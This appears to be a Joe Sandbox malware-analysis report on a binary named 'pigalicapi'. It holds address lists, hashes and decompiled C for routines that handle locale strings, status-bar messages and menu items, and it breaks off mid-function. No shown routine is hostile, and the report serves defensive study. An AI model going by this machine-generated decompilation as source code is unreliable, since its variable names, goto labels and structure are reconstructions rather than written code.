                                                                                                                                                                                                                                                                                          0x00815caf
                                                                                                                                                                                                                                                                                          0x00815caf
                                                                                                                                                                                                                                                                                          0x00815cb2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815cb2
                                                                                                                                                                                                                                                                                          0x00815c61
                                                                                                                                                                                                                                                                                          0x00815c61
                                                                                                                                                                                                                                                                                          0x00815ccd
                                                                                                                                                                                                                                                                                          0x00815ccd
                                                                                                                                                                                                                                                                                          0x00815cd0
                                                                                                                                                                                                                                                                                          0x00815cd3
                                                                                                                                                                                                                                                                                          0x00815cd4
                                                                                                                                                                                                                                                                                          0x00815cd9
                                                                                                                                                                                                                                                                                          0x00815d32
                                                                                                                                                                                                                                                                                          0x00815d34
                                                                                                                                                                                                                                                                                          0x00815d37
                                                                                                                                                                                                                                                                                          0x00815d3b
                                                                                                                                                                                                                                                                                          0x00815d46
                                                                                                                                                                                                                                                                                          0x00815d3d
                                                                                                                                                                                                                                                                                          0x00815d3d
                                                                                                                                                                                                                                                                                          0x00815d3d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815cdb
                                                                                                                                                                                                                                                                                          0x00815cdb
                                                                                                                                                                                                                                                                                          0x00815cde
                                                                                                                                                                                                                                                                                          0x00815cfd
                                                                                                                                                                                                                                                                                          0x00815d02
                                                                                                                                                                                                                                                                                          0x00815d05
                                                                                                                                                                                                                                                                                          0x00815d08
                                                                                                                                                                                                                                                                                          0x00815d10
                                                                                                                                                                                                                                                                                          0x00815d13
                                                                                                                                                                                                                                                                                          0x00815d5a
                                                                                                                                                                                                                                                                                          0x00815d5f
                                                                                                                                                                                                                                                                                          0x00815d65
                                                                                                                                                                                                                                                                                          0x00815d69
                                                                                                                                                                                                                                                                                          0x00815d6b
                                                                                                                                                                                                                                                                                          0x00815d6e
                                                                                                                                                                                                                                                                                          0x00815d6e
                                                                                                                                                                                                                                                                                          0x00815d6e
                                                                                                                                                                                                                                                                                          0x00815d6e
                                                                                                                                                                                                                                                                                          0x00815d72
                                                                                                                                                                                                                                                                                          0x00815d15
                                                                                                                                                                                                                                                                                          0x00815d26
                                                                                                                                                                                                                                                                                          0x00815d26
                                                                                                                                                                                                                                                                                          0x00815d29
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815d29
                                                                                                                                                                                                                                                                                          0x00815d0a
                                                                                                                                                                                                                                                                                          0x00815d0a
                                                                                                                                                                                                                                                                                          0x00815d2c
                                                                                                                                                                                                                                                                                          0x00815d2c
                                                                                                                                                                                                                                                                                          0x00815d2f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815d2f
                                                                                                                                                                                                                                                                                          0x00815ce0
                                                                                                                                                                                                                                                                                          0x00815ce0
                                                                                                                                                                                                                                                                                          0x00815d48
                                                                                                                                                                                                                                                                                          0x00815d48
                                                                                                                                                                                                                                                                                          0x00815d4b
                                                                                                                                                                                                                                                                                          0x00815d79
                                                                                                                                                                                                                                                                                          0x00815d7e
                                                                                                                                                                                                                                                                                          0x00815d7f
                                                                                                                                                                                                                                                                                          0x00815d83
                                                                                                                                                                                                                                                                                          0x00815d88
                                                                                                                                                                                                                                                                                          0x00815d88
                                                                                                                                                                                                                                                                                          0x00815d4d
                                                                                                                                                                                                                                                                                          0x00815d4d
                                                                                                                                                                                                                                                                                          0x00815d50
                                                                                                                                                                                                                                                                                          0x00815d8e
                                                                                                                                                                                                                                                                                          0x00815d92
                                                                                                                                                                                                                                                                                          0x00815d94
                                                                                                                                                                                                                                                                                          0x00815d97
                                                                                                                                                                                                                                                                                          0x00815d97
                                                                                                                                                                                                                                                                                          0x00815d97
                                                                                                                                                                                                                                                                                          0x00815d97
                                                                                                                                                                                                                                                                                          0x00815d9b
                                                                                                                                                                                                                                                                                          0x00815d9b
                                                                                                                                                                                                                                                                                          0x00815d52
                                                                                                                                                                                                                                                                                          0x00815d52
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815d52
                                                                                                                                                                                                                                                                                          0x00815d50
                                                                                                                                                                                                                                                                                          0x00815d4b
                                                                                                                                                                                                                                                                                          0x00815cde
                                                                                                                                                                                                                                                                                          0x00815cd9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815cb7
                                                                                                                                                                                                                                                                                          0x00815cb7
                                                                                                                                                                                                                                                                                          0x00815cb9
                                                                                                                                                                                                                                                                                          0x00815cbc
                                                                                                                                                                                                                                                                                          0x00815cc0
                                                                                                                                                                                                                                                                                          0x00815ccb
                                                                                                                                                                                                                                                                                          0x00815cc2
                                                                                                                                                                                                                                                                                          0x00815cc2
                                                                                                                                                                                                                                                                                          0x00815cc2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815cc0
                                                                                                                                                                                                                                                                                          0x00815c20
                                                                                                                                                                                                                                                                                          0x00815c26
                                                                                                                                                                                                                                                                                          0x00815c2e
                                                                                                                                                                                                                                                                                          0x00815c32
                                                                                                                                                                                                                                                                                          0x00815c3b
                                                                                                                                                                                                                                                                                          0x00815c3b
                                                                                                                                                                                                                                                                                          0x00815c32
                                                                                                                                                                                                                                                                                          0x00815bf1
                                                                                                                                                                                                                                                                                          0x00815bf6
                                                                                                                                                                                                                                                                                          0x00815bfc
                                                                                                                                                                                                                                                                                          0x00815c01
                                                                                                                                                                                                                                                                                          0x00815c04
                                                                                                                                                                                                                                                                                          0x00815c06
                                                                                                                                                                                                                                                                                          0x00815c09
                                                                                                                                                                                                                                                                                          0x00815c09
                                                                                                                                                                                                                                                                                          0x00815c09
                                                                                                                                                                                                                                                                                          0x00815c09
                                                                                                                                                                                                                                                                                          0x00815c0d
                                                                                                                                                                                                                                                                                          0x00815c0d
                                                                                                                                                                                                                                                                                          0x00815d9f
                                                                                                                                                                                                                                                                                          0x00815da1
                                                                                                                                                                                                                                                                                          0x00815bc5
                                                                                                                                                                                                                                                                                          0x00815bca
                                                                                                                                                                                                                                                                                          0x00815bd0
                                                                                                                                                                                                                                                                                          0x00815bd9
                                                                                                                                                                                                                                                                                          0x00815bde
                                                                                                                                                                                                                                                                                          0x00815bde
                                                                                                                                                                                                                                                                                          0x00815be8
                                                                                                                                                                                                                                                                                          0x00815be8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00815BB9
                                                                                                                                                                                                                                                                                            • Part of subcall function 008159F5: __getptd.LIBCMT ref: 00815A08
                                                                                                                                                                                                                                                                                            • Part of subcall function 00817A0D: __getptd_noexit.LIBCMT ref: 00817A0D
                                                                                                                                                                                                                                                                                          • __stricmp_l.LIBCMT ref: 00815C26
                                                                                                                                                                                                                                                                                            • Part of subcall function 00818087: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00818096
                                                                                                                                                                                                                                                                                          • ___crtLCMapStringA.LIBCMT ref: 00815C7C
                                                                                                                                                                                                                                                                                          • ___crtLCMapStringA.LIBCMT ref: 00815CFD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2544346105-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e81381012233a32f466daf1c9effd4de1b6a53fdfbdc6e1d13210bb8a7fa3cdc
                                                                                                                                                                                                                                                                                          • Instruction ID: 636e70a915b4f1950d11e81ffbb759f7c17e1a866c46e242dd9488cfe2209a54
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81381012233a32f466daf1c9effd4de1b6a53fdfbdc6e1d13210bb8a7fa3cdc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3513D70904699DBDB259B64C489BFD7BB8FF81318F284199E061DB1D1D7308EC1DB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E0080D300(unsigned int __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v264;
                                                                                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                                                                                          				signed char _t19;
                                                                                                                                                                                                                                                                                          				signed short _t25;
                                                                                                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                                                                          				signed short _t35;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t51 = __esi;
                                                                                                                                                                                                                                                                                          				_t50 = __edi;
                                                                                                                                                                                                                                                                                          				_t35 = __ecx;
                                                                                                                                                                                                                                                                                          				_t16 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t16 ^ _t53;
                                                                                                                                                                                                                                                                                          				_t19 = __ecx >> 0x10;
                                                                                                                                                                                                                                                                                          				_t41 = 0xffff;
                                                                                                                                                                                                                                                                                          				if(_t19 != 0xffff || _a4 != 0) {
                                                                                                                                                                                                                                                                                          					_v264 = 0;
                                                                                                                                                                                                                                                                                          					if((_t19 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t50 + 0x28), 0x409, 1, 0);
                                                                                                                                                                                                                                                                                          						_t41 =  &_v264;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t50 + 0x28), 0x401, 0x1ff,  &_v264);
                                                                                                                                                                                                                                                                                          						_t51 = _t51;
                                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t25 = _t35 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					if(_t35 < 0xf000 || _t35 >= 0xf1f0) {
                                                                                                                                                                                                                                                                                          						if(_t35 < 0xe110 || _t35 > 0xe11f) {
                                                                                                                                                                                                                                                                                          							if(_t35 >= 0xff00 && _t35 <= 0xfffd) {
                                                                                                                                                                                                                                                                                          								_t25 = 0xef1f;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t25 = 0xefda;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t25 = ((_t35 & 0x0000ffff) - 0x0000f000 >> 0x00000004) - 0x00001100 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t27 = LoadStringA( *0x880c0c, _t25 & 0x0000ffff,  &_v264, 0x100);
                                                                                                                                                                                                                                                                                          					_t40 = 0;
                                                                                                                                                                                                                                                                                          					if(_t27 > 0) {
                                                                                                                                                                                                                                                                                          						while( *((intOrPtr*)(_t53 + _t40 - 0x104)) != 0xa) {
                                                                                                                                                                                                                                                                                          							_t40 = _t40 + 1;
                                                                                                                                                                                                                                                                                          							if(_t40 < _t27) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L19;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *((char*)(_t53 + _t40 - 0x104)) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					SendMessageA( *(__edi + 0x28), 0x409, 0, 0);
                                                                                                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t34, _v8 ^ _t53, _t41, _t50, _t51);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x0080d300
                                                                                                                                                                                                                                                                                          0x0080d300
                                                                                                                                                                                                                                                                                          0x0080d300
                                                                                                                                                                                                                                                                                          0x0080d309
                                                                                                                                                                                                                                                                                          0x0080d310
                                                                                                                                                                                                                                                                                          0x0080d315
                                                                                                                                                                                                                                                                                          0x0080d318
                                                                                                                                                                                                                                                                                          0x0080d320
                                                                                                                                                                                                                                                                                          0x0080d340
                                                                                                                                                                                                                                                                                          0x0080d349
                                                                                                                                                                                                                                                                                          0x0080d3eb
                                                                                                                                                                                                                                                                                          0x0080d3ff
                                                                                                                                                                                                                                                                                          0x0080d404
                                                                                                                                                                                                                                                                                          0x0080d416
                                                                                                                                                                                                                                                                                          0x0080d418
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080d418
                                                                                                                                                                                                                                                                                          0x0080d354
                                                                                                                                                                                                                                                                                          0x0080d35a
                                                                                                                                                                                                                                                                                          0x0080d383
                                                                                                                                                                                                                                                                                          0x0080d39e
                                                                                                                                                                                                                                                                                          0x0080d3aa
                                                                                                                                                                                                                                                                                          0x0080d3aa
                                                                                                                                                                                                                                                                                          0x0080d38f
                                                                                                                                                                                                                                                                                          0x0080d38f
                                                                                                                                                                                                                                                                                          0x0080d38f
                                                                                                                                                                                                                                                                                          0x0080d366
                                                                                                                                                                                                                                                                                          0x0080d376
                                                                                                                                                                                                                                                                                          0x0080d376
                                                                                                                                                                                                                                                                                          0x0080d3c5
                                                                                                                                                                                                                                                                                          0x0080d3cb
                                                                                                                                                                                                                                                                                          0x0080d3cf
                                                                                                                                                                                                                                                                                          0x0080d3d3
                                                                                                                                                                                                                                                                                          0x0080d3dc
                                                                                                                                                                                                                                                                                          0x0080d3df
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080d3e1
                                                                                                                                                                                                                                                                                          0x0080d3e3
                                                                                                                                                                                                                                                                                          0x0080d3e3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080d328
                                                                                                                                                                                                                                                                                          0x0080d335
                                                                                                                                                                                                                                                                                          0x0080d419
                                                                                                                                                                                                                                                                                          0x0080d42b
                                                                                                                                                                                                                                                                                          0x0080d42b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$LoadString
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4010343828-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e6202d88eb1175ab5f857765a115ecc3ebe60c42230c0cb485b9f8363970221
                                                                                                                                                                                                                                                                                          • Instruction ID: 9b043787c3edcb67f4286ba4ea8e7a5ecb9235fb69cb460ada1705f2dacec67f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e6202d88eb1175ab5f857765a115ecc3ebe60c42230c0cb485b9f8363970221
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2031287070436A9BFB20A698CC85BFA7395FB65300F514039F282DB7C1E5B4DD818756
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E00811030(intOrPtr __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v44;
                                                                                                                                                                                                                                                                                          				signed char _v48;
                                                                                                                                                                                                                                                                                          				signed char _v52;
                                                                                                                                                                                                                                                                                          				signed char _v56;
                                                                                                                                                                                                                                                                                          				signed char _v60;
                                                                                                                                                                                                                                                                                          				void* _v64;
                                                                                                                                                                                                                                                                                          				signed char _v68;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t60 = __edi;
                                                                                                                                                                                                                                                                                          				_t37 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_t38 = _t37 ^ _t62;
                                                                                                                                                                                                                                                                                          				_v12 = _t37 ^ _t62;
                                                                                                                                                                                                                                                                                          				_t51 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t51 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					return E008159E6(_t38 | 0xffffffff, _t51, _v12 ^ _t62, _t59, _t60, _t61);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v44.left = 0;
                                                                                                                                                                                                                                                                                          					_v44.top = 0;
                                                                                                                                                                                                                                                                                          					_v44.right = 0;
                                                                                                                                                                                                                                                                                          					_v44.bottom = 0;
                                                                                                                                                                                                                                                                                          					GetClientRect( *(__edi + 4),  &_v44);
                                                                                                                                                                                                                                                                                          					_t59 =  *(__edi + 0x44);
                                                                                                                                                                                                                                                                                          					_t38 = GetMenuItemCount( *(__edi + 0x44));
                                                                                                                                                                                                                                                                                          					_t61 = _t51 + 1;
                                                                                                                                                                                                                                                                                          					_v68 = _t38;
                                                                                                                                                                                                                                                                                          					if(_t61 == _t51) {
                                                                                                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t51 = SendMessageA;
                                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                                          						if(_t61 >= _v68) {
                                                                                                                                                                                                                                                                                          							_t61 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v64 = 0;
                                                                                                                                                                                                                                                                                          						_v60 = 0;
                                                                                                                                                                                                                                                                                          						_v56 = 0;
                                                                                                                                                                                                                                                                                          						_v52 = 0;
                                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t60 + 4), 0x417, _t61,  &_v64);
                                                                                                                                                                                                                                                                                          						_t59 =  &_v28;
                                                                                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                                          						_t38 = SendMessageA( *(_t60 + 4), 0x41d, _t61,  &_v28);
                                                                                                                                                                                                                                                                                          						if(_v20 > _v44.right) {
                                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t38 = _v56;
                                                                                                                                                                                                                                                                                          						if((_t38 & 0x00000004) == 0 || (_t38 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          							_t61 = _t61 + 1;
                                                                                                                                                                                                                                                                                          							if(_t61 != _a4) {
                                                                                                                                                                                                                                                                                          								goto L3;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							if(_t61 == _a4) {
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								return E008159E6(_t61, _t51, _v12 ^ _t62, _t59, _t60, _t61);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                                                                                          						_t61 = 0xfffffffe;
                                                                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x00811030
                                                                                                                                                                                                                                                                                          0x00811036
                                                                                                                                                                                                                                                                                          0x0081103b
                                                                                                                                                                                                                                                                                          0x0081103d
                                                                                                                                                                                                                                                                                          0x00811041
                                                                                                                                                                                                                                                                                          0x00811048
                                                                                                                                                                                                                                                                                          0x008110e3
                                                                                                                                                                                                                                                                                          0x008110f5
                                                                                                                                                                                                                                                                                          0x0081104e
                                                                                                                                                                                                                                                                                          0x00811053
                                                                                                                                                                                                                                                                                          0x00811056
                                                                                                                                                                                                                                                                                          0x00811059
                                                                                                                                                                                                                                                                                          0x0081105c
                                                                                                                                                                                                                                                                                          0x00811064
                                                                                                                                                                                                                                                                                          0x0081106a
                                                                                                                                                                                                                                                                                          0x0081106e
                                                                                                                                                                                                                                                                                          0x00811074
                                                                                                                                                                                                                                                                                          0x00811077
                                                                                                                                                                                                                                                                                          0x0081107c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081107e
                                                                                                                                                                                                                                                                                          0x0081107e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00811084
                                                                                                                                                                                                                                                                                          0x00811087
                                                                                                                                                                                                                                                                                          0x00811089
                                                                                                                                                                                                                                                                                          0x00811089
                                                                                                                                                                                                                                                                                          0x00811090
                                                                                                                                                                                                                                                                                          0x00811093
                                                                                                                                                                                                                                                                                          0x00811096
                                                                                                                                                                                                                                                                                          0x00811099
                                                                                                                                                                                                                                                                                          0x0081109c
                                                                                                                                                                                                                                                                                          0x008110aa
                                                                                                                                                                                                                                                                                          0x008110ae
                                                                                                                                                                                                                                                                                          0x008110b3
                                                                                                                                                                                                                                                                                          0x008110b6
                                                                                                                                                                                                                                                                                          0x008110b9
                                                                                                                                                                                                                                                                                          0x008110bc
                                                                                                                                                                                                                                                                                          0x008110c8
                                                                                                                                                                                                                                                                                          0x008110d0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008110d2
                                                                                                                                                                                                                                                                                          0x008110d7
                                                                                                                                                                                                                                                                                          0x008110dd
                                                                                                                                                                                                                                                                                          0x008110e1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008110fd
                                                                                                                                                                                                                                                                                          0x008110fd
                                                                                                                                                                                                                                                                                          0x00811100
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00811102
                                                                                                                                                                                                                                                                                          0x00811113
                                                                                                                                                                                                                                                                                          0x00811113
                                                                                                                                                                                                                                                                                          0x00811100
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008110f8
                                                                                                                                                                                                                                                                                          0x008110f8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008110f8
                                                                                                                                                                                                                                                                                          0x0081107c
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ClientCountItemMenuRect
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4098442271-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 11b195277570965da320c64b71ec7b4a5d4629994916805db4b9a686d4a03d16
                                                                                                                                                                                                                                                                                          • Instruction ID: 5ae06c23562136ab895dead0e027bcdb80f64fb8cc8394077349dd2d4c92ed57
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11b195277570965da320c64b71ec7b4a5d4629994916805db4b9a686d4a03d16
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A31EDB1D05618AF8F54DFA8D8859EEFBF8FF0C310B10422AE519E7240D731A981CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E00809BC0(intOrPtr __ecx, CHAR* __edx, void* __eflags, int _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				intOrPtr _v280;
                                                                                                                                                                                                                                                                                          				CHAR* _v284;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
